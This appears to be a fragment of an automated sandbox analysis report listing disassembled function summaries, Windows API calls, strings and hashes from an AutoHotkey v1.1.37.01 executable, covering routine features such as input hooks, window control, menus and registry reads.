                                      • Sleep.KERNEL32(0000000A,?,00408D82,00000000,004089D8,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000000,0040635D,?), ref: 0040E590
                                      • GetTickCount.KERNEL32 ref: 0040E5A7
                                      • PeekMessageW.USER32(?,00000000,00000417,00000417,00000001), ref: 0040E5CA
                                      • CreateMutexW.KERNEL32(00000000,00000000,AHK Keybd), ref: 0040E645
                                      • GetExitCodeThread.KERNEL32(00000000,?), ref: 0040E65A
                                      • GetTickCount.KERNEL32 ref: 0040E66A
                                      • Sleep.KERNEL32(00000000), ref: 0040E677
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E68F
                                        • Part of subcall function 0040EBD0: _free.LIBCMT ref: 0040EC3D
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E6AF
                                      • CreateMutexW.KERNEL32(00000000,00000000,AHK Mouse), ref: 0040E6D4
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E6EB
                                      Strings
                                      • Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function., xrefs: 0040E719
                                      • AHK Mouse, xrefs: 0040E6CB
                                      • AHK Keybd, xrefs: 0040E63C
                                      Similarity
                                      • API ID: Thread$CloseCreateHandle$CountMessageMutexSleepTick$CodeExitPeekPostPriority_free
                                      • String ID: AHK Keybd$AHK Mouse$Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
                                      • API String ID: 1532042170-3816831916
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetIconInfo.USER32(?,?), ref: 004821E1
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00482206
                                      • CreateCompatibleDC.GDI32(00000000), ref: 0048221C
                                      • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 00482270
                                      • SelectObject.GDI32(00000000,00000000), ref: 00482283
                                      • DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 004822A7
                                      • GdiFlush.GDI32 ref: 004822AD
                                      • GetDIBits.GDI32(?,?,00000000,?,?,00000028,00000000), ref: 004822EE
                                      Strings
                                      Similarity
                                      • API ID: CreateIconObject$BitsCompatibleDrawFlushInfoSectionSelect
                                      • String ID: (
                                      • API String ID: 1804173336-3887548279
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0041C620: __wcsicoll.LIBCMT ref: 0041C638
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • SendMessageTimeoutW.USER32(00000000,000000F0,00000000,00000000,00000002,000007D0,?), ref: 0045D388
                                      • IsWindowEnabled.USER32(00000000), ref: 0045D3BC
                                      • IsWindowVisible.USER32(00000000), ref: 0045D3E6
                                      • SendMessageTimeoutW.USER32(00000000,0000130B,00000000,00000000,00000002,000007D0,?), ref: 0045D424
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 0045D45A
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 0045D4B7
                                      • SendMessageTimeoutW.USER32(00000000,00000188,00000000,00000000,00000002,000007D0,?), ref: 0045D51B
                                      • SendMessageTimeoutW.USER32(00000000,0000018A,?,00000000,00000002,000007D0,?), ref: 0045D541
                                      • SendMessageTimeoutW.USER32(00000000,00000189,?,00000000), ref: 0045D59A
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 0045D63F
                                      Strings
                                      Similarity
                                      • API ID: MessageSendTimeout$Window$ClassName$Visible$EnabledForeground__wcsicoll
                                      • String ID: Combo$List$SysListView32
                                      • API String ID: 4132077911-371123625
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • _memset.LIBCMT ref: 004401A7
                                      • __fassign.LIBCMT ref: 00440217
                                      • GetWindowRect.USER32(00000000,?), ref: 00440292
                                      • EnumChildWindows.USER32(00000000,Function_00046E40,?), ref: 004402B3
                                      Strings
                                      Similarity
                                      • API ID: Window$ChildEnumForegroundRectVisibleWindows__fassign_memset
                                      • String ID: Pos
                                      • API String ID: 2064314021-3096748108
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: CountLocalTickTime__swprintf__wcsicoll
                                      • String ID: %02d$%03d$MSec
                                      • API String ID: 3794994719-2031959049
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: <response command="feature_get" feature_name="%e" supported="%i" transaction_id="%e">%s</response>$breakpoint_types$encoding$language_$max_children$max_data$max_depth$multiple_sessions$name$protocol_version$supports_async$supports_threads$version
                                      • API String ID: 909875538-401246380
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindResourceW.KERNEL32(00000000,?,0000000A,?,?,00000000,0041F063,004DA728,?,004B6410,00000000,00000000), ref: 0041F5BD
                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000000,0041F063,004DA728,?,004B6410,00000000,00000000,?,?,?,?,00404330), ref: 0041F5CC
                                      • LockResource.KERNEL32(00000000,?,?,00000000,0041F063,004DA728,?,004B6410,00000000,00000000,?,?,?,?,00404330), ref: 0041F5DB
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,00000000,0041F063,004DA728,?,004B6410,00000000,00000000,?,?,?,?,00404330), ref: 0041F5EC
                                      • FindResourceW.KERNEL32(00000001,00000002,0000000A,0000030C,00404330), ref: 0041F6C2
                                      Strings
                                      Similarity
                                      • API ID: Resource$Find$LoadLockSizeof
                                      • String ID: #Include$%s file "%s" cannot be opened.$*#2$Out of memory.$Script$Too many includes.
                                      • API String ID: 3127896203-3189951223
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _wcschr.LIBCMT ref: 0041B2D9
                                      • __fassign.LIBCMT ref: 0041B31B
                                        • Part of subcall function 0049A0CD: __fassign.LIBCMT ref: 0049A0C3
                                      Strings
                                      Similarity
                                      • API ID: __fassign$_wcschr
                                      • String ID: Analog$Aux$Digital$Headphones$Line$Master$Microphone$N/A$PCSpeaker$Speakers$Synth$Telephone$Wave
                                      • API String ID: 3927346847-2477456585
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: AltTab$AltTabAndMenu$AltTabMenu$AltTabMenuDismiss$Off$ShiftAltTab$Toggle
                                      • API String ID: 3832890014-1651597821
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __wcstoi64.LIBCMT ref: 0044B63B
                                      • MessageBeep.USER32(00000000), ref: 0044B653
                                        • Part of subcall function 0049A0D8: __wcstoi64.LIBCMT ref: 0049A0E4
                                      • mciSendStringW.WINMM(status AHK_PlayMe mode,?,00000208,00000000), ref: 0044B68B
                                      • mciSendStringW.WINMM(close AHK_PlayMe,00000000,00000000,00000000), ref: 0044B6A0
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044B6C2
                                      Strings
                                      Similarity
                                      • API ID: SendString$__wcstoi64$BeepMessage
                                      • String ID: close AHK_PlayMe$open "%s" alias AHK_PlayMe$play AHK_PlayMe$status AHK_PlayMe mode$stopped
                                      • API String ID: 315599926-4077410995
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Enabled$Focus$FocusV$Hwnd$Name$Pos$Visible
                                      • API String ID: 3832890014-542124868
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • __wcsicoll.LIBCMT ref: 0045C86A
                                      • GetSystemMenu.USER32(00000000,00000000), ref: 0045C878
                                      • GetMenu.USER32(00000000), ref: 0045C894
                                      • GetMenuItemCount.USER32(00000000), ref: 0045C8A9
                                      • __fassign.LIBCMT ref: 0045C929
                                      • GetMenuItemID.USER32(?,?), ref: 0045C950
                                      • GetSubMenu.USER32(?,?), ref: 0045C95F
                                      • GetMenuItemCount.USER32(00000000), ref: 0045C96A
                                      Similarity
                                      • API ID: Menu$Item$CountWindow$ForegroundSystemVisible__fassign__wcsicoll
                                      • String ID:
                                      • API String ID: 3951159358-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDC.USER32(00000000), ref: 004820BC
                                      • CreateCompatibleDC.GDI32(00000000), ref: 004820C9
                                      • GetIconInfo.USER32(?,?), ref: 004820DF
                                      • GetObjectW.GDI32(?,00000018,?), ref: 004820F9
                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00482112
                                      • SelectObject.GDI32(00000000,00000000), ref: 00482120
                                      • CreateSolidBrush.GDI32(FF000000), ref: 0048214B
                                      • FillRect.USER32(00000000,?,00000000), ref: 0048215A
                                      • DeleteObject.GDI32(00000000), ref: 00482161
                                      • DrawIconEx.USER32(00000000,00000000,00000000,?,?,?,00000000,00000000,00000003), ref: 00482181
                                      • SelectObject.GDI32(00000000,00000000), ref: 00482189
                                      • DeleteObject.GDI32(?), ref: 0048219E
                                      • DeleteObject.GDI32(?), ref: 004821A5
                                      • DeleteDC.GDI32(00000000), ref: 004821AC
                                      • ReleaseDC.USER32(00000000,00000000), ref: 004821B5
                                      • DestroyIcon.USER32(?,?,75295780), ref: 004821BC
                                      Similarity
                                      • API ID: Object$Delete$CreateIcon$CompatibleSelect$BitmapBrushDestroyDrawFillInfoRectReleaseSolid
                                      • String ID:
                                      • API String ID: 2104539931-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsicoll_memmove$_wcsncpy
                                      • String ID: "$ErrorLevel$Illegal parameter name.$Out of memory.$Variable name too long.
                                      • API String ID: 3055118137-3900197193
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsicoll$_wcsncpy
                                      • String ID: %sGui$Close$ContextMenu$DropFiles$Escape$Size
                                      • API String ID: 1630244902-459179435
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetClassNameW.USER32(?,?,00000020), ref: 0045D0DC
                                      • SendMessageTimeoutW.USER32(?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045D11E
                                      • GetParent.USER32 ref: 0045D134
                                      • SetLastError.KERNEL32(00000000,?,?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045D146
                                      • GetDlgCtrlID.USER32 ref: 0045D14D
                                      • GetLastError.KERNEL32(?,?,?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045D159
                                      • SendMessageTimeoutW.USER32(00000000,00000111,?,?,00000002,000007D0,000000FF), ref: 0045D186
                                      • SendMessageTimeoutW.USER32(00000000,00000111,00000002,?,00000002,000007D0,000000FF), ref: 0045D1AE
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045D1D4
                                      • SendMessageTimeoutW.USER32(?,0000018F,000000FF,?,00000002,000007D0,?), ref: 0045D219
                                      • SendMessageTimeoutW.USER32(?,00000185,00000001,?,00000002,000007D0,?), ref: 0045D23D
                                      Similarity
                                      • API ID: MessageSendTimeout$ErrorLast$ClassCtrlLongNameParentWindow
                                      • String ID: Combo$List

                                      Similarity
                                      • API ID: _memset
                                      • String ID: %sBottom$%sLeft$%sRight$%sTop$Parameter #2 invalid.$h

                                      APIs
                                      • GetPropW.USER32(?,ahk_autosize), ref: 00474324
                                      • RemovePropW.USER32(?,ahk_autosize), ref: 0047433F
                                      • GetWindowRect.USER32(?,?), ref: 0047437E
                                      • GetWindowRect.USER32(?,?), ref: 004743BF
                                      • MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 00474400
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0047441C
                                      • SendMessageW.USER32(-00000002,0000132C,00000000,00000000), ref: 00474455
                                      • MoveWindow.USER32(-00000002,?,?,?,?,00000001), ref: 0047447B
                                      • SendMessageW.USER32(?,0000132C,00000000,00000000), ref: 00474499
                                      • SendMessageW.USER32(00000000,0000130A,00000000,?), ref: 004744BD
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,0000132C,00000000,00000000), ref: 0047452B
                                      Similarity
                                      • API ID: Window$MessageSend$MovePropRect$LongPointsRemove
                                      • String ID: ahk_autosize

                                      APIs
                                      • LoadLibraryW.KERNEL32(advapi32,?,00000000), ref: 0045C014
                                      • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 0045C049
                                      • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 0045C058
                                      • _memset.LIBCMT ref: 0045C08A
                                      • CloseHandle.KERNEL32(?), ref: 0045C130
                                      • GetLastError.KERNEL32 ref: 0045C152
                                      • FreeLibrary.KERNEL32(00000000), ref: 0045C15F
                                      Similarity
                                      • API ID: Library$Free$AddressCloseErrorHandleLastLoadProc_memset
                                      • String ID: CreateProcessWithLogonW$CreateProcessWithLogonW.$D$RunAs: Missing advapi32.dll.$advapi32

                                      APIs
                                      • StringFromGUID2.OLE32(-00000014,?,00000028), ref: 004635E6
                                        • Part of subcall function 00463400: _free.LIBCMT ref: 0046348C
                                      Similarity
                                      • API ID: FromString_free
                                      • String ID: DispatchIID$DispatchType$EventSink$IID$IID$Name$Object$Prefix$Value$VarType$object

                                      Similarity
                                      • API ID: __wcsicoll$String$FreeFrom
                                      • String ID: class$clsid$iid$name

                                      APIs
                                        • Part of subcall function 0041C620: __wcsicoll.LIBCMT ref: 0041C638
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • SendMessageTimeoutW.USER32(00000000,000000F0,00000000,00000000,00000002,000007D0,?), ref: 0045D388
                                      • IsWindowEnabled.USER32(00000000), ref: 0045D3BC
                                      • IsWindowVisible.USER32(00000000), ref: 0045D3E6
                                      • SendMessageTimeoutW.USER32(00000000,0000130B,00000000,00000000,00000002,000007D0,?), ref: 0045D424
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 0045D45A
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 0045D4B7
                                      • SendMessageTimeoutW.USER32(00000000,00000188,00000000,00000000,00000002,000007D0,?), ref: 0045D51B
                                      • SendMessageTimeoutW.USER32(00000000,0000018A,?,00000000,00000002,000007D0,?), ref: 0045D541
                                      • SendMessageTimeoutW.USER32(00000000,00000189,?,00000000), ref: 0045D59A
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 0045D63F
                                      Similarity
                                      • API ID: MessageSendTimeout$Window$ClassName$Visible$EnabledForeground__wcsicoll
                                      • String ID: Combo$SysListView32

                                      Similarity
                                      • API ID:
                                      • String ID: @

                                      APIs
                                        • Part of subcall function 0047FFB0: _vswprintf_s.LIBCMT ref: 0047FFC9
                                      • __itow.LIBCMT ref: 0041208B
                                      • __swprintf.LIBCMT ref: 004121FC
                                      Similarity
                                      • API ID: __itow__swprintf_vswprintf_s
                                      • String ID: %i-%i$%s%s%s%s%s%s$(no)$OFF$PART$TypeOff?LevelRunningName-------------------------------------------------------------------

                                      Similarity
                                      • API ID:
                                      • String ID: EndKey$EndKey:$Match$Max$NewInput$Stopped$Timeout$sc%03X

                                      Similarity
                                      • API ID: _wcschr$CharKeyboardLayoutLower__wcsnicmp
                                      • String ID: Alt$Ctrl$Shift

                                      APIs
                                      • FindWindowW.USER32(AutoHotkey,02C4017C), ref: 0040473A
                                      • FindWindowW.USER32(AutoHotkey,02C4017C), ref: 0040479C
                                      • PostMessageW.USER32(00000000,00000044,00000406,00000000), ref: 004047AF
                                      • Sleep.KERNEL32(00000014,?,?,?,?,?,00404346), ref: 004047BF
                                      • IsWindow.USER32(00000000), ref: 004047C8
                                      • Sleep.KERNEL32(00000014,?,?,?,?,?,00404346), ref: 004047FA
                                      • IsWindow.USER32(00000000), ref: 004047FD
                                      • Sleep.KERNEL32(00000064,?,?,?,?,?,00404346), ref: 00404805
                                      Strings
                                      • An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta, xrefs: 0040476F
                                      • AutoHotkey, xrefs: 00404735, 00404797
                                      • Could not close the previous instance of this script. Keep waiting?, xrefs: 004047E3
                                      Similarity
                                      • API ID: Window$Sleep$Find$MessagePost
                                      • String ID: An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta$AutoHotkey$Could not close the previous instance of this script. Keep waiting?

                                      APIs
                                        • Part of subcall function 004142C0: __fassign.LIBCMT ref: 004142D0
                                      • GetClassNameW.USER32(?,?,00000020), ref: 0045D043
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045D095
                                      • SendMessageTimeoutW.USER32(?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045D11E
                                      • GetParent.USER32 ref: 0045D134
                                      • SetLastError.KERNEL32(00000000,?,?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045D146
                                      • GetDlgCtrlID.USER32 ref: 0045D14D
                                      • GetLastError.KERNEL32(?,?,?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045D159
                                      • SendMessageTimeoutW.USER32(00000000,00000111,?,?,00000002,000007D0,000000FF), ref: 0045D186
                                      • SendMessageTimeoutW.USER32(00000000,00000111,00000002,?,00000002,000007D0,000000FF), ref: 0045D1AE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: MessageSendTimeout$ErrorLast$ClassCtrlLongNameParentWindow__fassign
                                      • String ID: Combo$List
                                      • API String ID: 2104288607-1246219895
                                      • Opcode ID: 99f8e3ba44cc00bfc8254b6a9d8757a639de66430857f4d61280d14a8e99a449
                                      • Instruction ID: 64f394173fa6ce294eadd19af5878517337a2685a3f9cd86112ab4450a6cda27
                                      • Opcode Fuzzy Hash: 99f8e3ba44cc00bfc8254b6a9d8757a639de66430857f4d61280d14a8e99a449
                                      • Instruction Fuzzy Hash: BF31D970F443056AE7309F609C86F7B76A8DF85B11F00062BBE15EA1D2DAACDC498769
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000000,?), ref: 0047C68C
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,?,00000000,00000000,?), ref: 0047C6AF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: OpenQueryValue
                                      • String ID:
                                      • API String ID: 4153817207-0
                                      • Opcode ID: ac7b69f31564c49ae3066a85039faa26c1027097124247fa0cc8fa72d22ba07a
                                      • Instruction ID: 10f8cc8de5ea8d871d1a7c63fee194d31aec333fd32772b961b744fa9cc65141
                                      • Opcode Fuzzy Hash: ac7b69f31564c49ae3066a85039faa26c1027097124247fa0cc8fa72d22ba07a
                                      • Instruction Fuzzy Hash: F7B1B3B12043029BD724DF69D8C5EBBB3E8EB98704F00892EF549D7250DB74DD458B6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: _wcschr$_malloc_memmove_wcsncpy
                                      • String ID: "$Out of memory.
                                      • API String ID: 278627150-1555670740
                                      • Opcode ID: 2a7be64baea612efc5026e0370838be237df44805ad369801105621e1c2273f9
                                      • Instruction ID: 29e8954e17d0373225af1b5c4e4cd10c76706f45c0aed13724dcdbe78cd93573
                                      • Opcode Fuzzy Hash: 2a7be64baea612efc5026e0370838be237df44805ad369801105621e1c2273f9
                                      • Instruction Fuzzy Hash: BE91B1B1E002159BDF24EF54CC81AAFB7B4EF48314F15406EE905A7341EB789E45CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Close$ContextMenu$DropFiles$Escape$Size
                                      • API String ID: 3832890014-3360012346
                                      • Opcode ID: bc50ccfc5e7fcf58a729ebb25d51cdc8ab5dfd9e566fd3f47c6dbd56c2ba6f05
                                      • Instruction ID: c5455d538713f770327abc346c9d9bf2a077c7085266911add73bc7505164ff6
                                      • Opcode Fuzzy Hash: bc50ccfc5e7fcf58a729ebb25d51cdc8ab5dfd9e566fd3f47c6dbd56c2ba6f05
                                      • Instruction Fuzzy Hash: EB71A332A04315ABCB309A25890176773A8EF84B54F09886FEC469B350F7B8DC45C7AB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDC.USER32(?), ref: 0046A341
                                      • SelectObject.GDI32(00000000,?), ref: 0046A365
                                      • GetTextMetricsW.GDI32(00000000,?), ref: 0046A378
                                      • GetSystemMetrics.USER32(00000002), ref: 0046A398
                                      • GetDC.USER32(?), ref: 0046A3F6
                                      • SelectObject.GDI32(00000000,?), ref: 0046A419
                                      • GetSystemMetrics.USER32(00000005), ref: 0046A493
                                      • GetSystemMetrics.USER32(00000006), ref: 0046A49F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Metrics$System$ObjectSelect$Text
                                      • String ID: @$@,
                                      • API String ID: 3198775916-1203063547
                                      • Opcode ID: 852901c86cf68278bcf9f054401ac65db5713a98731305d162a4dd4ab5285344
                                      • Instruction ID: 3318a6a2c9b316b1f856e4670a85651de54aec165521894726323a207b7af0bc
                                      • Opcode Fuzzy Hash: 852901c86cf68278bcf9f054401ac65db5713a98731305d162a4dd4ab5285344
                                      • Instruction Fuzzy Hash: A961D3719087418FC324DF28C84976BBBE1BF85304F18491EE98A97391E7B89851CF8B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Monitor$MonitorCount$MonitorName$MonitorPrimary$MonitorWorkArea
                                      • API String ID: 3832890014-629551668
                                      • Opcode ID: 80f7093c841948a1b175d9a642bdd45193ae37816271e6a79ac371f81aac3973
                                      • Instruction ID: d5e1272c07fe3006b95e2f1af2b4ec9e6785130d25038b1e73d7a272ad97ed6d
                                      • Opcode Fuzzy Hash: 80f7093c841948a1b175d9a642bdd45193ae37816271e6a79ac371f81aac3973
                                      • Instruction Fuzzy Hash: F1016259B41A1132EE3521395D03BDA60858B90B0BF94497AB914D93C5F78DDA44C0ED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Close$Exist$Priority$Wait$WaitClose
                                      • API String ID: 3832890014-1466124334
                                      • Opcode ID: 5c55dd9977b78e2a9ca51e9936c1f026fe200048652b979544d6d84ad93d0ee1
                                      • Instruction ID: 4de72bd59183f8f51b2dc933a3d72cc3654f8bc448ef428bc7e8ad7932b6eedc
                                      • Opcode Fuzzy Hash: 5c55dd9977b78e2a9ca51e9936c1f026fe200048652b979544d6d84ad93d0ee1
                                      • Instruction Fuzzy Hash: 21F09065A85A2121DF25252D5D53BEB20845B60F0BFD4457BF800D12C1F38EDE81C1BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Caret$Menu$Mouse$Pixel$ToolTip
                                      • API String ID: 3832890014-3728172800
                                      • Opcode ID: fd6c63114c51b9ba34f944b147c4eb871e2159a8f250615d54ea9b34ce018740
                                      • Instruction ID: a15dd1b9b9830ed505e8634de6e726437304dea02b7d94128b73395eabfc1785
                                      • Opcode Fuzzy Hash: fd6c63114c51b9ba34f944b147c4eb871e2159a8f250615d54ea9b34ce018740
                                      • Instruction Fuzzy Hash: A9F017A9E4161122EE2A211D5E02BEB64885F21747F94447FBC0096281F79EDA85D1AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ
                                      • API String ID: 3832890014-2346799943
                                      • Opcode ID: 3e78642d8acf8ce7ecb664dbd9fabd0c13d4669dbd5056657034086c5d576348
                                      • Instruction ID: d3946fa960ef78e0a204cdde2f62aa48fef47191b1b8e175ac83ded8a15a87d6
                                      • Opcode Fuzzy Hash: 3e78642d8acf8ce7ecb664dbd9fabd0c13d4669dbd5056657034086c5d576348
                                      • Instruction Fuzzy Hash: 2CF01C59A81A1632DE0920395E03BCF64849B61B8BFD405BAFC14D43C2F78ECA54C1FE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CheckMenuItem.USER32(00000000,0000FF19,?), ref: 0047747B
                                      • CheckMenuItem.USER32(00000000,0000FF1A,00000100), ref: 0047749B
                                      • GetCursorPos.USER32(?), ref: 004774B6
                                      • GetForegroundWindow.USER32(?,?,?,?,00445693,80000000,80000000), ref: 00477502
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00477517
                                      • SetForegroundWindow.USER32(0002044A), ref: 00477532
                                      • SetForegroundWindow.USER32(0002044A), ref: 00477559
                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,0002044A,00000000,?,?,?,?,00445693,80000000,80000000), ref: 0047757E
                                      • PostMessageW.USER32(0002044A,00000000,00000000,00000000), ref: 004775A3
                                      • GetForegroundWindow.USER32(?,?,?,?,00445693,80000000,80000000), ref: 004775B3
                                      • SetForegroundWindow.USER32(00000000), ref: 004775C2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Window$Foreground$Menu$CheckItem$CursorMessagePopupPostProcessThreadTrack
                                      • String ID:
                                      • API String ID: 4142709844-0
                                      • Opcode ID: eed962cdb18f4441f7bd4cdedc245371aa97d258b845f29a16dccfa3a829c648
                                      • Instruction ID: 6691b06162de7a46d904467c113024ea020879c3dbdafd7ecec9b02f6626c8a0
                                      • Opcode Fuzzy Hash: eed962cdb18f4441f7bd4cdedc245371aa97d258b845f29a16dccfa3a829c648
                                      • Instruction Fuzzy Hash: 50511671654301ABD720EF24EC81BBA7BA0AB45704F44863BF949A7791D378AC448BED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: _wcsrchr$_wcschr
                                      • String ID: ://
                                      • API String ID: 2648016162-1869659232
                                      • Opcode ID: a80b8a16876ac66192cf3dac2d8b96d2bb992ab6ce74570da517a0fc32917bef
                                      • Instruction ID: 9f645e654967765eab9fb2194b5fcc88fce73a06e7c26e8e491f25b2c9cb55df
                                      • Opcode Fuzzy Hash: a80b8a16876ac66192cf3dac2d8b96d2bb992ab6ce74570da517a0fc32917bef
                                      • Instruction Fuzzy Hash: 61714731A403115BEB30AE148C42BAF73A5DB80755F05492EFD45AB381EFACED45879A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • The maximum number of InputBoxes has been reached., xrefs: 00446037
                                      • AutoHotkey v1.1.37.01, xrefs: 0044606F, 00446079
                                      • The InputBox window could not be displayed., xrefs: 004462F2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: _wcsncpy
                                      • String ID: AutoHotkey v1.1.37.01$The InputBox window could not be displayed.$The maximum number of InputBoxes has been reached.
                                      • API String ID: 1735881322-1416150321
                                      • Opcode ID: cc6785e0fe593b75fa64882d3bc6e65ba3c5c5ca2db854e94e6bbc2f43e0679d
                                      • Instruction ID: 24c5464e0b8b2676bd3b82f55efb01de924ad5d1b93625a8cd9471f9277c77f3
                                      • Opcode Fuzzy Hash: cc6785e0fe593b75fa64882d3bc6e65ba3c5c5ca2db854e94e6bbc2f43e0679d
